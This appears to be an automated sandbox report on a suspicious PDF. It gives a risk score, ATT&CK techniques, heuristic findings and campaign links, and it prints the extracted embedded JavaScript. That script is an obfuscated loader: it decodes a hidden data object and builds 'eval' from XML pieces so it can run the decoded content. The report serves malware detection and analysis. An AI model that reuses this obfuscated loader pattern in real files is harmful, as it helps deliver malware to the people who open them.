SUSPICIOUS
54
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript that appears to decode content from a data object named 'xampp' and then execute it. The ML classifier strongly indicates maliciousness. The JavaScript's obfuscated nature and the presence of embedded content suggest it's a downloader for a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 3
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign:
shared payload 1bc4bf38a7
55 samples
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x1CC | 254 bytes |
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){ rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd); rf=re.one.value+re.two.value;this[rf](rc);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.